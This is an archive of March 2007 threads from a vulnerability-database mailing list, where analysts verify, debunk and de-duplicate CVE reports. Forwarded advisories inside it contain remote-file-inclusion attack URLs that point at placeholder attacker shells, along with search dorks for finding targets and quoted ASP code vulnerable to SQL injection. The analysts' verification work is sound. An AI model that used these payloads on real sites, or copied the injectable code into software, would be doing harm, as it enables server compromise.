From jericho at attrition.org Thu Mar 1 23:39:12 2007 From: jericho at attrition.org (security curmudgeon) Date: Thu, 1 Mar 2007 23:39:12 -0500 (EST) Subject: [VIM] phpProfiles vendor ack Message-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-6740 http://linuxwebshop.com/forum/viewtopic.php?t=40 Posted: Fri Dec 22, 2006 2:11 pm Post subject: Security Alert Hackers have found a way to exploit the script the way it is written. We use variables that are defined in config.php for some of the include paths. Since the script is open source, a hacker is able to download the script and learn the names given to these variables (i.e. $incpath, $usrinc, etc.). The hacker then uses the variables to call code from their server. The solution will be to change all of the include variables to absolute paths: include("$usrinc/body.inc.php"); to include("include/body.inc.php"); etc ... The fix will involve some time to complete. Until then, while we took down the demo we did leave the downlaod up in case someone wants to use the script & make the modifications themselves. More about the issue is available at: [url]http://www.securityfocus.com/bid/21667/discuss[/url] From jericho at attrition.org Fri Mar 2 03:08:37 2007 From: jericho at attrition.org (security curmudgeon) Date: Fri, 2 Mar 2007 03:08:37 -0500 (EST) Subject: [VIM] Valdersoft Shopping Cart - follow-up Message-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-6691 Since the product isn't free, I was checking to see if the three different common.php files mentioned were all the same, or attempt to determine it via the demo on the vendor's web site. When loading them, one only yields a blank page (common_include/common.php) and the other two resulted in a path disclosure when calling the files directly. So as best I can tell, at least one of the files may be different than the rest, or may require some form of additional access. http://www.valdersoft.com/store/include/common.php http://www.valdersoft.com/store/admin/include/common.php From f.riphagen at nsec.nl Fri Mar 2 15:14:21 2007 From: f.riphagen at nsec.nl (Ferdy Riphagen) Date: Fri, 02 Mar 2007 21:14:21 +0100 Subject: [VIM] [Fwd: SPAW Editor PHP Edition] Message-ID: <45E8859D.8020908@nsec.nl> The file mentioned here is only a patch. img_library,php contains: // include wysiwyg config include '../config/spaw_control.config.php'; include $spaw_root.'class/util.class.php'; include $spaw_root.'class/lang.class.php'; With a install you have to rename "../config/spaw_control.default.config.php" to "../config/spaw_control.config.php" spaw_control.config.php contains: // calculate root folder for spaw files $spaw_root = realpath(dirname(__FILE__)."/.."); $spaw_root = str_replace("\\","/",$spaw_root); if (!ereg('/$', $spaw_root)) $spaw_root = $spaw_root."/"; The patch is for the "zend_hash_del_key_or_index" vulnerability by using the hashes for "spaw_imglib_include" (-86707544, -411170602) --Ferdy-- -------- Original Message -------- Remote IInclude File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4 Discovered By : Hasadya Raed Contact Me : RaeD[at]BsdMail[dot]Com Download Script: http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip B.File :img_library.php : include $spaw_root.'class/util.class.php'; include $spaw_root.'class/lang.class.php'; =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= Expl:-http://www.victim.com/spaw/dialogs/img_library.php?spaw_root=[Shell-AttacK] By Hasadya Raed -- _______________________________________________ Get your free email from http://bsdmail.com From coley at linus.mitre.org Fri Mar 2 15:35:35 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 2 Mar 2007 15:35:35 -0500 (EST) Subject: [VIM] [Fwd: SPAW Editor PHP Edition] In-Reply-To: <45E8859D.8020908@nsec.nl> References: <45E8859D.8020908@nsec.nl> Message-ID: By the way, it's been on my to-do list to investigate other disclosures involving $spaw_root in other products; looks like SPAW Editor is included in other products. CVE-2006-5459 - Download-Engine CVE-2006-5291 - Download-Engine CVE-2006-4656 - Web Provence SL_Site CVE-2006-2928 - CMS-Bandits CVE-2006-2519 - phpwcms It kinda bugs me when it takes us 5 CVE's to realize that we might be dealing with a third-party component :-/ spaw_control.class.php is most frequently mentioned, but other files are mentioned too. Some of these files might be glue code for the specific product. - Steve From coley at mitre.org Fri Mar 2 15:50:32 2007 From: coley at mitre.org (Steven M. Christey) Date: Fri, 2 Mar 2007 15:50:32 -0500 (EST) Subject: [VIM] Lameness Disclaimer Message-ID: <200703022050.l22KoW5T018925@faron.mitre.org> from Bugtraq "WordPress Search Function SQL-Injection" http://www.securityfocus.com/archive/1/461473/100/0/threaded | SaMuschie Research Labs was found to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers.... they don't know the answer ;) Naturally, the post (maybe a forced SQL error at most) has two followups with inability to reproduce. - Steve From jericho at attrition.org Fri Mar 2 19:22:18 2007 From: jericho at attrition.org (security curmudgeon) Date: Fri, 2 Mar 2007 19:22:18 -0500 (EST) Subject: [VIM] [Fwd: SPAW Editor PHP Edition] In-Reply-To: References: <45E8859D.8020908@nsec.nl> Message-ID: : By the way, it's been on my to-do list to investigate other disclosures : involving $spaw_root in other products; looks like SPAW Editor is : included in other products. From: security curmudgeon To: OSVDB Mods Cc: Steven Christey Date: Mon, 27 Nov 2006 06:37:24 -0500 (EST) Reply-To: moderators at osvdb.org Subject: [OSVDB Mods] omg omg SPAW I sent this mail out just days before I got slammed with work and never got around to looking at it in more detail. This was specifically over spaw_control.class.php being found vulnerable in a number of packages. : CVE-2006-5459 - Download-Engine : CVE-2006-5291 - Download-Engine : CVE-2006-4656 - Web Provence SL_Site : CVE-2006-2928 - CMS-Bandits : CVE-2006-2519 - phpwcms OSVDB 26368 AWF CMS spaw_control.class.php spaw_root Variable Remote File Inclusion OSVDB 18155 Website Generator spaw_control.class.php Direct Request Path Disclosure From coley at linus.mitre.org Fri Mar 2 21:58:23 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 2 Mar 2007 21:58:23 -0500 (EST) Subject: [VIM] [Fwd: SPAW Editor PHP Edition] In-Reply-To: References: <45E8859D.8020908@nsec.nl> Message-ID: > From: security curmudgeon > To: OSVDB Mods > Cc: Steven Christey > Date: Mon, 27 Nov 2006 06:37:24 -0500 (EST) > Subject: [OSVDB Mods] omg omg SPAW Wow, I barely remember that email. I must admit that we have some issues with "institutional memory," e.g. codebase relationships, which CVE's need some kind of tweak, etc. > OSVDB 26368 > AWF CMS spaw_control.class.php spaw_root Variable Remote File Inclusion > > OSVDB 18155 > Website Generator spaw_control.class.php Direct Request Path Disclosure Path disclosure eh? Smells like insufficient diagnosis to me :) - Steve From coley at linus.mitre.org Sat Mar 3 15:09:30 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Sat, 3 Mar 2007 15:09:30 -0500 (EST) Subject: [VIM] Neohapsis face lift Message-ID: For those of you who do automatic scrubbing... >The Neohapsis Archives have undergone a face lift. Please let us know if >you notice any issues. ex: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0299.html And there's a search utility on the front page... or was that always there? - Steve From jericho at attrition.org Sat Mar 3 18:29:18 2007 From: jericho at attrition.org (security curmudgeon) Date: Sat, 3 Mar 2007 18:29:18 -0500 (EST) Subject: [VIM] Neohapsis face lift In-Reply-To: References: Message-ID: : For those of you who do automatic scrubbing... : : >The Neohapsis Archives have undergone a face lift. Please let us know if : >you notice any issues. : : ex: : : : http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0299.html : : And there's a search utility on the front page... or was that always : there? It was always there. Just a hook into using Google to search their archives. From coley at mitre.org Sat Mar 3 21:22:54 2007 From: coley at mitre.org (Steven M. Christey) Date: Sat, 3 Mar 2007 21:22:54 -0500 (EST) Subject: [VIM] Novell BorderManager ISAKMP issue smells like a dupe Message-ID: <200703040222.l242Msn5021430@faron.mitre.org> Refs: https://secure-support.novell.com/KanisaPlatform/Publishing/201/3003139_f.SAL_Public.html (CVE forthcoming) and http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974551.htm CVE-2006-5286 All the vuln DB's have created separate ID's for these advisories. CVE-2006-5286 was released in Oct 2006, and the other was released in Nov 2006. Both references point to bmvpnsec1.exe as a patch, and so does the CONFIRM in this item. However, 3003139 does not reference TID2974551, CVE-2006-5286, or any other item that can prove a correlation between the two. In addition, 3003139 mentions other more serious impacts that were not in TID2974551. So, who knows whether these are really the same or not. - Steve From coley at mitre.org Sat Mar 3 21:30:11 2007 From: coley at mitre.org (Steven M. Christey) Date: Sat, 3 Mar 2007 21:30:11 -0500 (EST) Subject: [VIM] Keyword Replacer plugin RFI seems to be fixed Message-ID: <200703040230.l242UBa6021607@faron.mitre.org> Ref: http://milw0rm.com/exploits/2528 Vector: addon_keywordreplacer.php?pathToFiles SECUNIA:22401 states "the vulnerability is confirmed in the release from 29/05/2006." Downloading the ZIP file mentioned in the disclosure, we see that addon_keywordreplacer.php is dated Oct 25, 2006 - about 2 weeks after the initial milw0rm post. The first line is now: if (!defined('INCLUDED776')) die ('Fatal error.'); I don't have an older version to compare it to, so I don't know if the original disclosure was just grep-and-gripe. - Steve From steve at vitriol.net Mon Mar 5 10:41:59 2007 From: steve at vitriol.net (Steve Tornio) Date: Mon, 05 Mar 2007 09:41:59 -0600 Subject: [VIM] CVE-2007-0028 Message-ID: <45EC3A47.8010706@vitriol.net> http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html I don't think this reference belongs in the entry, as I don't see any link between the Excel vulnerability and the WMF flaw referenced in the link. If I missed it, please correct me. Thanks, Steve osvdb.org From steve at vitriol.net Mon Mar 5 10:47:54 2007 From: steve at vitriol.net (Steve Tornio) Date: Mon, 05 Mar 2007 09:47:54 -0600 Subject: [VIM] CVE-2007-0028 In-Reply-To: <45EC3A47.8010706@vitriol.net> References: <45EC3A47.8010706@vitriol.net> Message-ID: <45EC3BAA.7060307@vitriol.net> Steve Tornio wrote: > http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html > > I don't think this reference belongs in the entry, as I don't see any > link between the Excel vulnerability and the WMF flaw referenced in the > link. If I missed it, please correct me. > Replying to myself to add another one: This mail list post is referenced: http://www.securityfocus.com/archive/1/archive/1/457274/100/0/threaded However, the content of that post explicitly states that the Excel issues including CVE-2007-0028 are not relevant. MS Patch - MS07-002 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (927198) Analysis - SMA does not have this component. Patch will not run successfully. Action - Customers should not be concerned with this issue Thanks, Steve From coley at linus.mitre.org Mon Mar 5 11:33:52 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 5 Mar 2007 11:33:52 -0500 (EST) Subject: [VIM] CVE-2007-0028 In-Reply-To: <45EC3A47.8010706@vitriol.net> References: <45EC3A47.8010706@vitriol.net> Message-ID: On Mon, 5 Mar 2007, Steve Tornio wrote: > http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html > > I don't think this reference belongs in the entry, as I don't see any > link between the Excel vulnerability and the WMF flaw referenced in the > link. If I missed it, please correct me. This is a good example of why I plan to make CVE's analysis field public at some point. See below for what happened. ALSO NOTE - the advisory that's returned on "FG-2006-30" is actually labeled as FGA-2005-17 and talks about that WMF issue from December 2005. So there's clearly something wrong with their web site on this, probably as a result of the advisory name switch. I filled out the form at http://www.fortiguardcenter.com/sendfeedback.php under "Report a broken link or network issue". Maybe someone else could fill out a similar complaint in a different category to maximize the chance of success... - Steve ====================================================== Name: CVE-2006-3432 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3432 Acknowledged: Announced: Flaw: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2007-0028. Reason: This candidate is a reservation duplicate of CVE-2007-0028. The original assigner switched to a new CVE number. Notes: All CVE users should reference CVE-2007-0028 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. ====================================================== Name: CVE-2007-0028 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0028 Acknowledged: yes advisory Announced: 20070109 Flaw: unk Reference: MISC:http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html Reference: MISC:http://www.fortinet.com/FortiGuardCenter/advisory/FGA-2007-01.html Reference: HP:HPSBST02184 Reference: URL:http://www.securityfocus.com/archive/1/archive/1/457274/100/0/threaded Reference: HP:SSRT071296 Reference: URL:http://www.securityfocus.com/archive/1/archive/1/457274/100/0/threaded Reference: MS:MS07-002 Reference: URL:http://www.microsoft.com/technet/security/Bulletin/MS07-002.mspx Reference: CERT:TA07-009A Reference: URL:http://www.us-cert.gov/cas/techalerts/TA07-009A.html Reference: CERT-VN:VU#493185 Reference: URL:http://www.kb.cert.org/vuls/id/493185 Reference: BID:21952 Reference: URL:http://www.securityfocus.com/bid/21952 Reference: FRSIRT:ADV-2007-0103 Reference: URL:http://www.frsirt.com/english/advisories/2007/0103 Reference: SECTRACK:1017485 Reference: URL:http://securitytracker.com/id?1017485 Reference: SECUNIA:23676 Reference: URL:http://secunia.com/advisories/23676 Microsoft Excel 2000, 2002, 2003, Viewer 2003, Office 2004 for Mac, and Office v.X for Mac does not properly handle certain opcodes, which allows user-assisted remote attackers to execute arbitrary code via a crafted XLS file, which results in an "Improper Memory Access Vulnerability." NOTE: an early disclosure of this issue used CVE-2006-3432, but only CVE-2007-0027 should be used. Analysis: ACCURACY: FG-2006-30 was originally published and used CVE-2006-3432, but Microsoft had updated all CVEs to 2007 numbers before disclosure. After MS07-002 was published, FG-2006-30 was changed to FGA-2007-01, and used the new CVE-2007-0027 identifier. From coley at linus.mitre.org Mon Mar 5 12:55:31 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 5 Mar 2007 12:55:31 -0500 (EST) Subject: [VIM] CVE-2007-0028 In-Reply-To: <45EC3A47.8010706@vitriol.net> References: <45EC3A47.8010706@vitriol.net> Message-ID: Steve, Looks like they fixed it nice and quick :) It now forwards to FGA-2007-01. > http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html - Steve From dm at securityfocus.com Wed Mar 7 18:02:04 2007 From: dm at securityfocus.com (dm at securityfocus.com) Date: Wed, 7 Mar 2007 16:02:04 -0700 Subject: [VIM] Bogus - [c_r_ck@hotmail.com: Lazarus Guestbook (admin.php)Remote File Include Expliot] Message-ID: <20070307230204.GT17103@securityfocus.com> One of our analysts looked at this and determined that it was bogus, here was their notes: $include_path = dirname(__FILE__); require_once $include_path.'/admin/config.inc.php'; require_once $include_path.'/lib/mysql.class.php'; require_once $include_path.'/lib/image.class.php'; require_once $include_path.'/lib/template.class.php'; require_once $include_path.'/lib/session.class.php'; require_once $include_path.'/lib/admin.class.php'; the vulnerable parameter 'include_path' is defined. Not vuln ----- Forwarded message from c_r_ck at hotmail.com ----- From: c_r_ck at hotmail.com Subject: Lazarus Guestbook (admin.php)Remote File Include Expliot To: bugtraq at securityfocus.com Date: 7 Mar 2007 23:23:05 -0000 X-Mailer: MIME-tools 5.411 (Entity 5.404) Message-ID: <20070307232305.1765.qmail at securityfocus.com> # Lazarus Guestbook (admin.php)Remote File Include Expliot # D.Script: http://www.carbonize.co.uk # Dork: "Powered by Lazarus Guestbook from carbonize.co.uk" # Discovered by Crack_man # Homepage: http://www.b0rizq.biz # Greetz To :B0rizq & red_casper & Draknaz kaiba & broken_proxy and all freind # Exploit: # [VicTim]/[path]/admin.php?include_path=shell.txt?cmd =========================== ----- End forwarded message ----- -- Dave McKinney Symantec keyID: BF919DD7 key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 From coley at linus.mitre.org Wed Mar 7 18:41:54 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 7 Mar 2007 18:41:54 -0500 (EST) Subject: [VIM] Bogus - [c_r_ck@hotmail.com: Lazarus Guestbook (admin.php)Remote File Include Expliot] In-Reply-To: <20070307230204.GT17103@securityfocus.com> References: <20070307230204.GT17103@securityfocus.com> Message-ID: On Wed, 7 Mar 2007 dm at securityfocus.com wrote: > require_once $include_path.'/admin/config.inc.php'; I've noticed that extract() and similar variable overwrites frequently occur in config files. Was admin/config.inc.php and others checked for these kinds of issues that might overwrite $include_path? - Steve From jericho at attrition.org Thu Mar 8 18:40:37 2007 From: jericho at attrition.org (security curmudgeon) Date: Thu, 8 Mar 2007 18:40:37 -0500 (EST) Subject: [VIM] NO monthly MS security bulletins coming in March (fwd) Message-ID: The calm before the storm? =) ---------- Forwarded message ---------- From: Juha-Matti Laurio X-Originating-IP: 88.115.116.156 To: funsec at linuxbox.org Date: Thu, 8 Mar 2007 22:43:11 +0200 (EET) Subject: [funsec] NO monthly MS security bulletins coming in March Believe or not... According to Microsoft Security Bulletin Advance Notification Program http://www.microsoft.com/technet/security/bulletin/advance.mspx _no new_ Microsoft Security Bulletins will be released on March 13, 2007 (i.e. the scheduled, monthly "Black Tuesday". An updated version of Microsoft Windows Malicious Software Removal Tool is coming, however. - Juha-Matti _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list. From rkeith at securityfocus.com Fri Mar 9 10:54:40 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Fri, 9 Mar 2007 08:54:40 -0700 (MST) Subject: [VIM] [false-report] [saw_xyz@yahoo.com: wwwpaintboar(newsfile) Remote File Inclusion Vulnerability] (fwd) Message-ID: The vendor page and the product name dont exist (according to Google). Changing it to wwwpaintboard (adding a D) however does reveal a product. That software also has the reported script and parameter. But, the script also calls a config.php file which clearly defines the parameter. http://obiewebsite.sourceforge.net/obie.php?WWW_Paint_Board So, presuming that is the correct software, it is a false report. -- Rob Keith Symantec ----- Forwarded message from saw_xyz at yahoo.com ----- From: saw_xyz at yahoo.com Subject: wwwpaintboar(newsfile) Remote File Inclusion Vulnerability To: bugtraq at securityfocus.com Date: 9 Mar 2007 10:43:48 -0000 X-Mailer: MIME-tools 5.411 (Entity 5.404) Message-ID: <20070309104348.24662.qmail at securityfocus.com> > wwwpaintboar(newsfile) Remote File Inclusion Vulnerability > ----------------------------------------------------------- > Version : 1.0 > Website URL: http://phpforge.oirac.com/ > ----------------------------------------------------------- > Discoved by saw_xyz (sasan) > [XIII Security Researcher] > Gr33tZ t0 :Snake > My Home : www.saw13.com > fuck ahsyane st an davood [ashy member] > ----------------------------------------------------------- > Vulnerable codeZ is in editor.php > in line 261 : > > ----------------------------------------------------------- > Ex: > http://127.0.0.1/%5bpatch%5d/editor.php?newsfile=%5bevil script] ----- End forwarded message ----- -- Dave McKinney Symantec keyID: BF919DD7 key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 From coley at mitre.org Sat Mar 10 15:58:58 2007 From: coley at mitre.org (Steven M. Christey) Date: Sat, 10 Mar 2007 15:58:58 -0500 (EST) Subject: [VIM] OpenBSD mbuf issue upgraded to "security" Message-ID: <200703102058.l2AKwwAG017934@faron.mitre.org> Ref: SECTRACK:1017735 Thought I'd mention this for the vdb's who don't report reliability problems. Issue was originally reported by OpenBSD as a RELIABILITY FIX and crash, as archived in SECTRACK:1017735, but the errata has since been changed/upgraded to security fix. Reference: http://www.openbsd.org/errata39.html#m_dup1 Reference: http://www.openbsd.org/errata40.html#m_dup1 This is CVE-2007-1365 - Steve From nikns at secure.lv Sat Mar 10 16:29:51 2007 From: nikns at secure.lv (Nikns Siankin) Date: Sat, 10 Mar 2007 23:29:51 +0200 Subject: [VIM] OpenBSD mbuf issue upgraded to "security" In-Reply-To: <200703102058.l2AKwwAG017934@faron.mitre.org> References: <200703102058.l2AKwwAG017934@faron.mitre.org> Message-ID: <20070310212951.GA27181@secure.lv> UPDATE: this has been elevated to a security issue. Using pf(4) to "block in inet6" is an effective workaround until the patch can be installed. http://undeadly.org/cgi?action=article&sid=20070308154628&mode=expanded On Sat, Mar 10, 2007 at 03:58:58PM -0500, Steven M. Christey wrote: > >Ref: SECTRACK:1017735 > >Thought I'd mention this for the vdb's who don't report reliability >problems. > >Issue was originally reported by OpenBSD as a RELIABILITY FIX and >crash, as archived in SECTRACK:1017735, but the errata has since been >changed/upgraded to security fix. > >Reference: http://www.openbsd.org/errata39.html#m_dup1 >Reference: http://www.openbsd.org/errata40.html#m_dup1 > >This is CVE-2007-1365 > >- Steve From jericho at attrition.org Sat Mar 10 23:19:50 2007 From: jericho at attrition.org (security curmudgeon) Date: Sat, 10 Mar 2007 23:19:50 -0500 (EST) Subject: [VIM] Exploit selling service up and running (fwd) Message-ID: >From the site: The vulnerabilities displayed on this website are not allowed to be put into any kind of exploit/vulnerability repositories. ---------- Forwarded message ---------- From: kingcope To: full-disclosure at lists.grok.org.uk Date: Sun, 11 Mar 2007 03:35:16 +0100 Subject: [Full-disclosure] Exploit selling service up and running Hello List, This is Kingcope. We now have our Exploit selling site up and running. On www.com-winner.com you can purchase quality advisories and exploits. Feel free to contact our sales person for getting the latest Zero-Days. Best Regards, kingcope com-winner.com Research Team From theall at tenablesecurity.com Mon Mar 12 20:11:48 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 12 Mar 2007 16:11:48 -0400 Subject: [VIM] Remote File Include In ClipShare.v1.5.3 Message-ID: <45F5B404.7010203@tenablesecurity.com> Has anyone been able to verify this (http://archives.neohapsis.com/archives/bugtraq/2007-03/0118.html)? The source for this app isn't publically available, but I've looked at copies of adodb-connection.inc.php included in other apps and all are implemented as a PHP class, with no ability to call it directly and get anything like a remote file include. In addition, while the code does use '$cmd', it's in a call to exec() rather than include(), and its value does not seem at first blush to be under an attacker's control. Methinks deaR aydasaH has things a bit backwards. George -- theall at tenablesecurity.com From jericho at attrition.org Mon Mar 12 20:25:36 2007 From: jericho at attrition.org (security curmudgeon) Date: Mon, 12 Mar 2007 20:25:36 +0000 (UTC) Subject: [VIM] Oracle and CIA Message-ID: Regarding the Jan CPU from Oracle: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html Did anyone notice that several of the vulnerabilities listed apparently do not impact Confidentiality, Integrity -or- Availability? Mistake/oversight, or something else? DB10, DB11, DB12, DB13, etc From theall at tenablesecurity.com Mon Mar 12 20:43:27 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 12 Mar 2007 16:43:27 -0400 Subject: [VIM] Oracle and CIA In-Reply-To: References: Message-ID: <45F5BB6F.4050600@tenablesecurity.com> On 03/12/07 16:25, security curmudgeon wrote: > Regarding the Jan CPU from Oracle: > http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html > > > Did anyone notice that several of the vulnerabilities listed apparently > do not impact Confidentiality, Integrity -or- Availability? > Mistake/oversight, or something else? > > DB10, DB11, DB12, DB13, etc There's a note below the table that clarifies those scores as representing "problems that are not exploitable in a default database environment". There's been some discussion of Oracle's scoring methodology on the CVSS-SIG mailing list. Hopefully now that they've joined the SIG, these sorts of issues will fade away. George -- theall at tenablesecurity.com From jericho at attrition.org Mon Mar 12 20:44:54 2007 From: jericho at attrition.org (security curmudgeon) Date: Mon, 12 Mar 2007 20:44:54 +0000 (UTC) Subject: [VIM] Oracle and CIA In-Reply-To: <45F5BB6F.4050600@tenablesecurity.com> References: <45F5BB6F.4050600@tenablesecurity.com> Message-ID: : > Regarding the Jan CPU from Oracle: : > http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html : > : > Did anyone notice that several of the vulnerabilities listed apparently do : > not impact Confidentiality, Integrity -or- Availability? Mistake/oversight, : > or something else? : > : > DB10, DB11, DB12, DB13, etc : : There's a note below the table that clarifies those scores as : representing "problems that are not exploitable in a default database : environment". As always, firing off mails before reading the entire thing =) : There's been some discussion of Oracle's scoring methodology on the : CVSS-SIG mailing list. Hopefully now that they've joined the SIG, these : sorts of issues will fade away. Good. Just because it doesn't exist in a default setup doesn't mean the vulnerability magically no longer affects C, I or A. From str0ke at milw0rm.com Mon Mar 12 21:49:49 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 12 Mar 2007 15:49:49 -0600 Subject: [VIM] Remote File Include In ClipShare.v1.5.3 In-Reply-To: <45F5B404.7010203@tenablesecurity.com> References: <45F5B404.7010203@tenablesecurity.com> Message-ID: <814b9d50703121449m6a684349o8c19229f94ee87f1@mail.gmail.com> haha, I have stopped checking his work do to the amount of false positives. /str0ke On 3/12/07, George A. Theall wrote: > Has anyone been able to verify this > (http://archives.neohapsis.com/archives/bugtraq/2007-03/0118.html)? The > source for this app isn't publically available, but I've looked at > copies of adodb-connection.inc.php included in other apps and all are > implemented as a PHP class, with no ability to call it directly and get > anything like a remote file include. > > In addition, while the code does use '$cmd', it's in a call to exec() > rather than include(), and its value does not seem at first blush to be > under an attacker's control. > > Methinks deaR aydasaH has things a bit backwards. > > George > -- > theall at tenablesecurity.com > From jericho at attrition.org Wed Mar 14 08:14:55 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 14 Mar 2007 08:14:55 +0000 (UTC) Subject: [VIM] Apple megapatch plugs 45 security holes (fwd) Message-ID: http://news.com.com/Apple+megapatch+plugs+45+security+holes/2100-1002_3-6166971.html By Joris Evers Staff Writer, CNET News.com March 13, 2007 Apple on Tuesday issued a security update for its Mac OS X to plug 45 security holes, including several zero-day vulnerabilities. The megapatch is the seventh Apple security patch release in three months. It deals with vulnerabilities in Apple's own software, as well as third-party components such as Adobe Systems' Flash Player, OpenSSH and MySQL. Sixteen of the vulnerabilities addressed by the update were previously released as part of two high-profile bug-hunting campaigns. The vulnerabilities pose varying risks to Macs. Several of the flaws could be exploited to gain full control over a Mac running the vulnerable component, according to Apple's advisory. Other holes are limited and could only be exploited to crash a Mac or used by somebody who already has access to a machine to elevate privileges, for example. One focus of the patch is to fix eight vulnerabilities in the way Mac OS X handles disk images, files that when opened appear as a drive within the Macintosh Finder. Mounting a malicious image may lead to an error and could provide a means for an attacker to breach a Mac, Apple said. Tuesday's update deals with nine vulnerabilities released as part of the Month of Apple Bugs in January and seven bugs disclosed in the Month of Kernel Bugs in November. In earlier fix releases, Apple fixed several flaws identified during the projects. While several of the vulnerabilities repaired by Apple's updates were previously known, it doesn't appear that any attacks that exploited the flaws actually occurred. In addition to the Mac OS X patch, Apple issued a second update on Tuesday to fix a security bug in iPhoto that could expose Mac users to a serious attack. An attacker could craft a malicious "photocast" which, when opened, could compromise a Mac, Apple said in its alert. The Photocasts feature allows people to share pictures in iPhoto. Tuesday's two releases bring Apple's total patch count for the year to seven. Microsoft, meanwhile, on Tuesday skipped its monthly patch day. However, it released a dozen security bulletins with fixes for 20 vulnerabilities in February and four bulletins with fixes for 10 bugs in January. The Apple patch can be downloaded and installed via the Software Update feature in Mac OS X, or from Apple Downloads. From heinbockel at mitre.org Wed Mar 14 13:21:36 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Wed, 14 Mar 2007 09:21:36 -0400 Subject: [VIM] SQL injection (x2) in NukeSentinel Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01A93A62@IMCSRV5.MITRE.ORG> BUGTRAQ:20070310 NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit http://www.securityfocus.com/archive/1/archive/1/462453/100/0/threaded Appears to be similar to CVE-2007-1172: BUGTRAQ:20070220 NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit http://www.securityfocus.com/archive/1/archive/1/460599/100/0/threaded Both exploits are SQL injections and the code looks remarkably similar. However, with the release of NukeSentinel 2.5.06, the vendor attempted to thwart CVE-2007-1172 with a weak regex -- In nukesentinel.php (line 61): > if(!ereg("^([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['remote_ip'])) {$nsnst_const['remote_ip'] = "none"; } So, they are checking to ensure the Client-IP HTTP Header contains a valid IP. Hence, the newer exploit code prepends a random dotted-quad IP address to the start of the SQL injection. Therefore, this is viewed by CVE as a new vulnerability and will be assigned a new CVE. William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From noamr at beyondsecurity.com Wed Mar 14 16:25:03 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Wed, 14 Mar 2007 18:25:03 +0200 Subject: [VIM] [TRUE] Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability Message-ID: <200703141825.03987.noamr@beyondsecurity.com> Hi, The vulnerability is true, but what is the nature of the vulnerability here? minigzip is not officially used as far as I know, by anything?! Anyone else? -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com -------------- next part -------------- An embedded message was scrubbed... From: "starcadi starcadi" Subject: Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability Date: Wed, 14 Mar 2007 16:49:36 +0100 Size: 5537 Url: http://www.attrition.org/pipermail/vim/attachments/20070314/b47d56ce/attachment-0001.mht From noamr at beyondsecurity.com Wed Mar 14 16:30:48 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Wed, 14 Mar 2007 18:30:48 +0200 Subject: [VIM] [TRUE] JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit Message-ID: <200703141830.48310.noamr@beyondsecurity.com> Hi, The vulnerability is there (vulnerable code): author = Request.QueryString("author") bid = Request.QueryString("bid") ' Check parameters If Not IsNumeric(bid) Then bid = 0 End If If CInt(bid) < 0 Then bid = 0 End If If title = "" And author = "" Then Call ParseError(langErrSearchNoInput) Call DoErrorMsg("./search.asp") End If ' Generate SQL sql = "SELECT * FROM posts" If title <> "" Then sql = sql & " WHERE post_title LIKE '%" & title & "%'" End If If author <> "" Then If InStr(sql, "WHERE") <> 0 Then sql = sql & " AND user_name='" & author & "'" Else sql = sql & " WHERE user_name='" & author & "'" End If End If ---------- Forwarded Message ---------- Subject: JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit Date: Tuesday 13 March 2007 19:21 From: UniquE at unique-key.org To: bugtraq at 